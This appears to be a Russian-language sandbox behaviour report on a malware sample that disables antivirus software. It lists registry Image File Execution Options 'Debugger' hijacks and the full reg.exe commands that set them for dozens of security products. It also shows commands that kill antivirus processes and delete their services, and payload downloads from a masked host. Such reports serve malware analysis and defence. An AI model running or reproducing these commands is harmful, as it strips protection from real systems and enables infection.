Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seccenter.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAV.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updatesrv.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiSeAgnt.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWinMgr.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareUpdater.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\op_mon.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LavasoftAdAwareService11.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemca.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrva.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsa.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgfws.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsa.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDSC.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iface.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\psksvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSvHost.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ApVxdWin.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfp.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpeng.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx64.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx86.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PavFnSvr.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SrvLoad.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrlS.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE] 'Debugger' = 'fadfjadfjddjx.exe'
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "bdagent.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "seccenter.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "UPDATESRV" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "helpsvc" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "updatesrv.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "ekrn.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "egui.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "vsserv.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "ekrn" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "VSSERV" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "KLIF" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "klkbdflt" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "KLIM6" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "AVP" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "avpui.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "bdselfpr" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "klmounflt" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "avp.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' (загружен из сети Интернет)
- '%WINDIR%\testx86.exe' (загружен из сети Интернет)
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareUpdater.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\op_mon.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "bdagent.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LavasoftAdAwareService11.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsa.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updatesrv.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsa.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgfws.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrva.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemca.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' /pid=2832
- '<SYSTEM32>\reg.exe' /pid=3212
- '<SYSTEM32>\reg.exe' -c -ctype service -cobject "helpsvc" -caction delete -s
- '<SYSTEM32>\reg.exe' /pid=3180
- '<SYSTEM32>\reg.exe' -c -ctype service -cobject "UPDATESRV" -caction delete -s
- '<SYSTEM32>\reg.exe' /pid=3276
- '<SYSTEM32>\reg.exe' /pid=3592
- '<SYSTEM32>\reg.exe' /pid=3236
- '<SYSTEM32>\reg.exe' /pid=3536
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "updatesrv.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' /pid=2864
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "seccenter.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' /pid=2848
- '<SYSTEM32>\reg.exe' /pid=1140
- '<SYSTEM32>\reg.exe' -c -ctype service -cobject "VSSERV" -caction delete -s
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "vsserv.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' /pid=2896
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seccenter.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\psksvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iface.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDSC.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSvHost.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx64.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PavFnSvr.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx86.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrlS.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAV.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWinMgr.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiSeAgnt.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ApVxdWin.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SrvLoad.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpeng.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfp.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- <SYSTEM32>\reg.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\watx86[1].exe
- %WINDIR%\wawiloniawowar.sys
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\testx86[1].exe
- %WINDIR%\testx86.exe
- 'ce###alstub.com':80
- 'localhost':1035
- ce###alstub.com/killer/watx86.exe
- ce###alstub.com/killer/testx86.exe
- DNS ASK ce###alstub.com